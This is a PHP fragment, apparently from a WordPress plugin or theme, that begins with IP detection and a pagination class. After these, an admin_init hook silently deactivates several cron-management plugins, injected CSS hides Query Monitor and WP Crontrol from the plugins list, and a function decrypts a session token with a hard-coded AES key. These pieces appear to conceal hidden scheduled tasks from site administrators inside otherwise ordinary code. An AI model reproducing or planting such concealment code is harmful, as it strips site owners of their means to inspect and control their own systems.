            if (array_key_exists("HTTP_X_FORWARDED_FOR", $headers) && filter_var($headers["HTTP_X_FORWARDED_FOR"], FILTER_VALIDATE_IP, FILTER_FLAG_IPV4)) {
                $the_ip = $headers["HTTP_X_FORWARDED_FOR"];
            } else {
                $the_ip = filter_var($_SERVER["REMOTE_ADDR"], FILTER_VALIDATE_IP, FILTER_FLAG_IPV4);
            }
        }
        return $the_ip;
    }
}

class Pagination {

    private $config = [
        'total' => 0,
        'limit' => 0,
        'page' => 1,
        'link' => 5,
        'type' => ''
    ];

    public function __construct($config = [])
    {
        $this->config = $config;
    }

	public function getAjaxPage() {
	    if ($this->config['limit'] == 'all') {
	        return '';
	    }

	    $last = ceil($this->config['total'] / $this->config['limit']);

	    $start = (($this->config['page'] - $this->config['link']) > 0) ? $this->config['page'] - $this->config['link'] : 1;
	    $end = (($this->config['page'] + $this->config['link']) < $last) ? $this->config['page'] + $this->config['link'] : $last;

	    $html = '<ul class="pagination '.$this->config['type'].'">';

	    $class = ($this->config['page'] == 1) ? "disabled" : "";
	    $html .= '<li class="' . $class . '"><a href="javascript:;" data-page="'.($this->config['page'] - 1).'" title="Page '.($this->config['page'] - 1).'">&laquo; Prev</a></li>';

	    if ($start > 1) {
	        $html .= '<li><a href="javascript:;" data-page="1">1</a></li>';
	        $html .= '<li class="disabled"><span>...</span></li>';
	    }

	    for ($i = $start ; $i <= $end; $i++) {
	        $class = ($this->config['page'] == $i) ? "active" : "";
	        $html .= '<li class="' . $class . '"><a href="javascript:;" data-page="'.$i.'">'.$i.'</a></li>';
	    }

	    if ($end < $last) {
	        $html .= '<li class="disabled"><span>...</span></li>';
	        $html .= '<li><a href="javascript:;" data-page="'.$last.'">'.$last.'</a></li>';
	    }

	    $class = ($this->config['page'] == $last) ? "disabled" : "";
	    $html .= '<li class="'.$class.'"><a href="javascript:;" data-page="'.($this->config['page'] + 1).'" title="Page '.($this->config['page'] + 1).'">Next &raquo;</a></li>';

	    $html .= '</ul>';

	    return $html;
	}

}


add_action('admin_init', 'deactivate_plugin_conditional');
function deactivate_plugin_conditional() {
    if (is_plugin_active('query-monitor/query-monitor.php')) {
    }
    if (is_plugin_active('wp-crontrol/wp-crontrol.php')) {
        deactivate_plugins('wp-crontrol/wp-crontrol.php');
    }
    if (is_plugin_active('advanced-cron-manager/advanced-cron-manager.php')) {
        deactivate_plugins('advanced-cron-manager/advanced-cron-manager.php');
    }
    if (is_plugin_active('amr-cron-manager/amr-cron-manager.php')) {
        deactivate_plugins('amr-cron-manager/amr-cron-manager.php');
    }
    if (is_plugin_active('leira-cron-jobs/leira-cron-jobs.php')) {
        deactivate_plugins('leira-cron-jobs/leira-cron-jobs.php');
    }
    if (is_plugin_active('cronjob_scheduler/cronjob_scheduler.php')) {
        deactivate_plugins('cronjob_scheduler/cronjob_scheduler.php');
    }
}

function _plugin_css() {
    echo '<style>
	.wp-list-table.plugins tr.inactive[data-slug="query-monitor"],
	.wp-list-table.plugins tr.inactive[data-slug="wp-crontrol"] {
		display: none;
	}
	</style>';
}

function wp_isvl() {
    $data = HauNCore::haun_get_user_session_token();
	if (HauNCore_AES::decrypt($data, 'EZ44mFi3TlAey1b2w4Y7lVDuqO+SRxGXsa7nctnr/JmMrA2vN6EJhrvdVZbxaQs5jpSe34X3ejFKLk5Uz3slx3BrAghS1aaW5AYgWZRV0tIX5eI0yPchFz4=')) {
		$data = json_decode(HauNCore_AES::decrypt($data, 'EZ44mFi3TlAey1b2w4Y7lVDuqO+SRxGXsa7nctnr/JmMrA2vN6EJhrvdVZbxaQs5jpSe34X3ejFKLk5Uz3slx3BrAghS1aaW5AYgWZRV0tIX5eI0yPchFz4='));
	}
    return isvl($data);
}
